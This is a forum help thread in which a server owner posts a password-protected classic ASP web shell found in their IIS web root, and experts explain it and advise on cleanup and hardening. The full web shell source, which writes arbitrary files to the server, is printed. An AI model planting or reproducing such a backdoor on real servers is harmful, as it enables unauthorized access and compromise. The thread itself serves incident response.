[2 days left] What’s wrong with your cloud strategy? Learn why multicloud solutions matter with Nimble Storage.Register Now

x
?
Solved

iis hack - can someone help deciper this text file left on my server ?

Posted on 2013-01-15
7
Medium Priority
?
469 Views
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
0
Comment
Question by:drelinger
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
  • 2
  • +1
7 Comments
 
LVL 51

Expert Comment

by:Steve Bink
ID: 38781228
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The scripts ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
0
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38781246
Where was this file located?
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 38781402
I agree with @routinet, it is a classic ASP file/program to write files on your server.
0
What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

 

Author Comment

by:drelinger
ID: 38782803
file was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
0
 
LVL 51

Accepted Solution

by:
Steve Bink earned 2000 total points
ID: 38782922
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
0
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38784322
Just to be sure, I would also run a reliable anti-spyware product like Malware Antibytes
0
 

Author Closing Comment

by:drelinger
ID: 38784446
Great advice. thank you very much.
0

Featured Post

Get your Disaster Recovery as a Service basics

Disaster Recovery as a Service is one go-to solution that revolutionizes DR planning. Implementing DRaaS could be an efficient process, easily accessible to non-DR experts. Learn about monitoring, testing, executing failovers and failbacks to ensure a "healthy" DR environment.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If you don't have the right permissions set for your WordPress location in IIS, you won't be able to perform automatic updates. Here's how to fix the problem.
As tax season makes its return, so does the increase in cyber crime and tax refund phishing that comes with it
In response to a need for security and privacy, and to continue fostering an environment members can turn to for support, solutions, and education, Experts Exchange has created anonymous question capabilities. This new feature is available to our Pr…
In a question here at Experts Exchange (https://www.experts-exchange.com/questions/29062564/Adobe-acrobat-reader-DC.html), a member asked how to create a signature in Adobe Acrobat Reader DC (the free Reader product, not the paid, full Acrobat produ…
Suggested Courses

656 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question